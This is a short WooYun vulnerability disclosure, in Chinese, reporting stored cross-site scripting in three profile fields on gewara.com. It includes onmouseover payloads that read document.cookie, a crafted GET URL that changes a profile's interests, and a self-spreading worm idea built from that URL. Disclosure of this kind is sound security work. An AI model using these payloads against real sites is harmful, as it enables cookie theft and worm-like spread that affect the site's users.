WooYun.org

在修改个人资料处有3处存储跨站点位置
1兴趣爱好：
添加兴趣
<div onmouseover="javascript:alert(document.cookie)">CCAV大学</div>

2教育信息
在大学处添加<div onmouseover="javascript:alert(document.cookie)">CCAV大学</div>

3职业信息
添加单位名称
<div onmouseover="javascript:alert(document.cookie)">CCAV大学</div>

这3处貌似都过滤了<script></script>.但是一些特殊字符还是不能过滤。
在这3处中只有兴趣爱好会在自己的首页中显示。其他的只能自己日自己了（但实际上想利用还是可以利用的）
我们看我们账户的首页：http://www.gewara.com/home/sns/othersPersonIndex.xhtml?memberid=40949089

还有一点就是这3个请求全都是get方式的。所以可以构造请求
http://www.gewara.com/home/acct/updateFavorInfo.xhtml?tag=%3Cdiv%20onmouseover%3D%22javascript%3Aalert%28document.cookie%29%22%3ECCAV%E5%A4%A7%E5%AD%A6%3C%2Fdiv%3E
构造兴趣为 <div onmouseover="javascript:window.locarion('上面构造的get请求')">CCAV大学</div>
想让全站CCAV还是可以的。缺点就是,不是访问自动触发，要用户鼠标划过兴趣爱好才行。